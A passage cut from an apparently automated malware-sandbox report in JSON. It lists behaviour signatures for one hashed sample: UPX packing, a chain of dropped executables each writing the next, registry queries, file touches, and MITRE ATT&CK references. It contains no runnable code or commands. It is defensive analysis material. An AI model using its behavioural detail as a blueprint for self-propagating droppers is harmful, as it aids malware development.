executable section named \"UPX0\"\n \"rdnjbjh.exe\" has an executable section named \"UPX1\"\n \"2408206.exe\" has an executable section named \"UPX0\"\n \"2408206.exe\" has an executable section named \"UPX1\"\n \"2204200.exe\" has an executable section named \"UPX0\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"64446.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"fjpblh.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"06268.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"rlxfxx.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"rxvnflf.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"80060.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"66686.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"624000.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"6206480.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"rdnjbjh.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"2408206.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"2204200.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"28042.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"028260.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"tfdbnrd.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"rjrvvt.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"blnxt.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"tnvhlh.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"ljhdxt.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"82426.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"28646.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"228864.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"8402266.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"088422.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"ptnfvbx.exe\" trying to access non-existent file \"c:\\FLTLIB.DLL\"\n \"ptnfvbx.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"ptnfvbx.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"ptnfvbx.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"ptnfvbx.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"ptnfvbx.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" reads file \"c:\\72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\"\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" reads file \"c:\\ptnfvbx.exe\"\n \"ptnfvbx.exe\" reads file \"c:\\ptnfvbx.exe\"\n \"ptnfvbx.exe\" reads file \"c:\\lbxbhh.exe\"\n \"lbxbhh.exe\" reads file \"c:\\lbxbhh.exe\"\n \"lbxbhh.exe\" reads file \"c:\\vplpt.exe\"\n \"vplpt.exe\" reads file \"c:\\vplpt.exe\"\n \"vplpt.exe\" reads file \"c:\\xdpjtxl.exe\"\n \"xdpjtxl.exe\" reads file \"c:\\xdpjtxl.exe\"\n \"xdpjtxl.exe\" reads file \"c:\\nxpbdf.exe\"\n \"nxpbdf.exe\" reads file \"c:\\nxpbdf.exe\"\n \"nxpbdf.exe\" reads file \"c:\\8080888.exe\"\n \"8080888.exe\" reads file \"c:\\8080888.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\MUI\\SETTINGS\"; Key: \"\"; Value: \"\")\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\LANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"\"; Value: \"\")\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\DIAGNOSTICS\"; Key: \"\"; Value: \"\")\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"\"; Value: \"\")\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\\TRACING\"; Key: \"\"; Value: \"\")\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLEAUT\"; Key: \"\"; Value: \"\")\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"ptnfvbx.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"lbxbhh.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"vplpt.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"xdpjtxl.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"nxpbdf.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"8080888.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"800866.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"4400860.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"8442880.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"482606.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"drrxb.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"ldlfr.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"00226.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"28886.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"4042240.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"42068.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"6028624.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"rbtft.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"rfhxbp.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"fhftdj.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"2886400.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"442602.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"8460680.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"xbbfdpr.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" trying to touch file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" trying to touch file \"c:\\ptnfvbx.exe\"\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" trying to touch file \"C:\\Windows\\system32\\apphelp.dll\"\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" trying to touch file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" trying to touch file \"c:\\ui\\SwDRM.dll\"\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" trying to touch file \"C:\\Windows\\System32\\imm32.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"ptnfvbx.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"lbxbhh.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"vplpt.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"xdpjtxl.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"nxpbdf.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"8080888.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"800866.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"4400860.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"8442880.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"482606.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"drrxb.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"ldlfr.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"72D8F41B75688B029B15FBC4843D988A9AFD1DD4C7ACC64BD9AD1B42F0F80A3E\"; Value: \"\")\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"AUTHENTICODEENABLED\"; Value: \"\")\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\APPCOMPAT\"; Key: \"DISABLEENGINE\"; Value: \"\")\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SHELL FOLDERS\"; Key: \"CACHE\"; Value: \"\")\n \"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\"; Key: \"DISABLELOCALOVERRIDE\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe\" writes file \"c:\\ptnfvbx.exe\"\n \"ptnfvbx.exe\" writes file \"c:\\lbxbhh.exe\"\n \"lbxbhh.exe\" writes file \"c:\\vplpt.exe\"\n \"vplpt.exe\" writes file \"c:\\xdpjtxl.exe\"\n \"xdpjtxl.exe\" writes file \"c:\\nxpbdf.exe\"\n \"nxpbdf.exe\" writes file \"c:\\8080888.exe\"\n \"8080888.exe\" writes file \"c:\\800866.exe\"\n \"800866.exe\" writes file \"c:\\4400860.exe\"\n \"4400860.exe\" writes file \"c:\\8442880.exe\"\n \"8442880.exe\" writes file \"c:\\482606.exe\"\n \"482606.exe\" writes file \"c:\\drrxb.exe\"\n \"drrxb.exe\" writes file \"c:\\ldlfr.exe\"\n \"ldlfr.exe\" writes file \"c:\\00226.exe\"\n \"00226.exe\" writes file \"c:\\28886.exe\"\n \"28886.exe\" writes file \"c:\\4042240.exe\"\n \"4042240.exe\" writes file \"c:\\42068.exe\"\n \"42068.exe\" writes file \"c:\\6028624.exe\"\n \"6028624.exe\" writes file \"c:\\rbtft.exe\"\n \"rbtft.exe\" writes file \"c:\\rfhxbp.exe\"\n \"rfhxbp.exe\" writes file \"c:\\fhftdj.exe\"\n \"fhftdj.exe\" writes file \"c:\\2886400.exe\"\n \"2886400.exe\" writes file \"c:\\442602.exe\"\n \"442602.exe\" writes file \"c:\\8460680.exe\"\n \"8460680.exe\" writes file \"c:\\xbbfdpr.exe\"\n \"xbbfdpr.exe\" writes file \"c:\\nblht.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"64446.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"fjpblh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"06268.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"rlxfxx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"rxvnflf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"80060.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"66686.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"624000.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"6206480.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"rdnjbjh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"2408206.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"2204200.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: 